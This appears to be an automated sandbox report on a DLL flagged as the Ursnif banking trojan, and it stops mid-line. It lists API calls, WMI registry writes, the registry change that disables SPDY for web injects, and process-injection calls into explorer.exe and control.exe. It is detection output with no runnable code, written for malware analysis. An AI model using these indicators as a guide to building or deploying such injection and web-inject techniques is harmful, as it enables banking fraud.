            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100181C0 EntryPoint,DestroyCursor,CreateMetaFileA,CloseFigure,AbortPath,DestroyCursor,GetMapMode,CharUpperW,OpenIcon,CharNextA,GdiGetBatchLimit,GetClipboardOwner,IsGUIThread,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,Get
ClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,0_2_100181C0
            Source: loaddll32.exe, 00000000.00000002.457120886.000000000153B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            Yara detected Ursnif
            Disables SPDY (HTTP compression, likely to perform web injects)
            Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_01511ADC GetLastError,NtClose, 0_2_01511ADC
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_01511A34 GetProcAddress,NtCreateSection,memset, 0_2_01511A34
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_015110BA NtMapViewOfSection, 0_2_015110BA
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_015123F5 NtQueryVirtualMemory, 0_2_015123F5
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F679B3 NtMapViewOfSection, 0_2_02F679B3
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F671B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02F671B9
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F67B01 GetProcAddress,NtCreateSection,memset, 0_2_02F67B01
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F6B2FD NtQueryVirtualMemory, 0_2_02F6B2FD
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_0122B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess, 0_2_0122B780
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B623A4 NtQueryInformationProcess, 37_2_03B623A4
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B613A8 NtMapViewOfSection, 37_2_03B613A8
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B58790 NtCreateSection, 37_2_03B58790
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B60BE8 NtReadVirtualMemory, 37_2_03B60BE8
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B52710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 37_2_03B52710
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B672AC NtWriteVirtualMemory, 37_2_03B672AC
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B68208 RtlAllocateHeap,NtQueryInformationProcess, 37_2_03B68208
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B76A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 37_2_03B76A5C
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B62DC4 NtQueryInformationProcess, 37_2_03B62DC4
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B710A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_03B710A0
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B6F0C0 NtAllocateVirtualMemory, 37_2_03B6F0C0
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B68800 NtQuerySystemInformation, 37_2_03B68800
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B8A004 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_03B8A004
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009C10A0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_009C10A0
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009BF0C0 NtAllocateVirtualMemory, 38_2_009BF0C0
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009B72AC NtWriteVirtualMemory, 38_2_009B72AC
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009B8208 NtQueryInformationProcess, 38_2_009B8208
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009C6A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_009C6A5C
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009A8790 NtCreateSection, 38_2_009A8790
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009B13A8 NtMapViewOfSection, 38_2_009B13A8
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009B23A4 NtQueryInformationProcess, 38_2_009B23A4
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009B0BE8 NtReadVirtualMemory, 38_2_009B0BE8
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009A2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_009A2710
            Source: C:\Windows\System32\control.exe, Code function: 38_2_009DA004 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_009DA004
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_015121D4 0_2_015121D4
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_100014EE 0_2_100014EE
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_100012F1 0_2_100012F1
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000155A 0_2_1000155A
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_100037DC 0_2_100037DC
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F6B0DC 0_2_02F6B0DC
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_02F65920 0_2_02F65920
            Source: C:\Windows\explorer.exe, Code function: 37_2_03B5E2F0 37_2_03B5E2F0
            Source: C:\Windows\explor